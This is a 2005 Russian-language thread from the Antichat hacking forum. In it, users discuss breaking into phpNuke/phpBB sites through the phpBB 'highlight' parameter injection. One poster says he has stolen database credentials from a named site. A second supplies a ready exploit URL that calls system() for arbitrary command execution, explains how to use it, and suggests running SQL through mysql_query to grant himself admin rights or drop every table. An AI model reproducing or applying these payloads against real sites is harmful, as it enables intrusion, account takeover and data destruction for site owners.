ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpnuke
  #1  
Старый 18.02.2005, 05:13
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
Thumbs up phpnuke

Зашёл на портал на движке phpпуке
Допустим www.mega-lol.net
Стырил пароль от базы и имя

&highlight=%2527.$poster=$dbpass.%2527
&highlight=%2527.$poster=$dbname.%2527

Как мне быть дальше?

Последний раз редактировалось (-=util=-); 18.02.2005 в 06:45..
 
Ответить с цитированием

  #2  
Старый 18.02.2005, 15:36
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Так. Серьезно. Ответь, сколько ты куриш?
Ты зря этим делом занимаешься,
если бы не курил ПЛАН, знал бы что
highlight в phpBB ))

Если ты там стырил пас от MySQL, то теперь делай так
Напиши его в блокнот
Закрой блокнот
Не сохраняй изменения
Забей на пароль

Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!))

Уже писал МИЛИОН раз про highlight.
И ещё напишу
viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527

Незабудь вместо [TOPIC] поставить номер топика

Последний раз редактировалось KEZ; 18.02.2005 в 15:38..
 
Ответить с цитированием

  #3  
Старый 18.02.2005, 17:13
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Спасибо, неленивый ты
Я некурю))))
 
Ответить с цитированием

  #4  
Старый 18.02.2005, 22:54
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Спасибо ))
 
Ответить с цитированием

  #5  
Старый 19.02.2005, 02:38
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
Talking

xxx- эт что?
uname- эт что?
 
Ответить с цитированием

  #6  
Старый 19.02.2005, 13:01
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

xxx - это параметр в строке в который нужно писать команду, ее запустит system()
uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux
 
Ответить с цитированием

  #7  
Старый 09.03.2005, 18:40
Аватар для temon
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723

Репутация: 5
По умолчанию

Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke.
как ни стараюсь не получается. прошу вас помггите.
 
Ответить с цитированием

  #8  
Старый 09.03.2005, 19:31
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь

2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью

&highlight=%2527.system($_GET[xxx]).include%2527

Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора?

Danke... =)
 
Ответить с цитированием

  #9  
Старый 10.03.2005, 23:14
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))

Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить...
Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx])
и вместо xxx писать SQL команды
Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID]
Или стереть все таблицы...

А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.
 
Ответить с цитированием

  #10  
Старый 11.03.2005, 13:41
Аватар для SladerNon
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию

Занимательно....., Спасибо!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ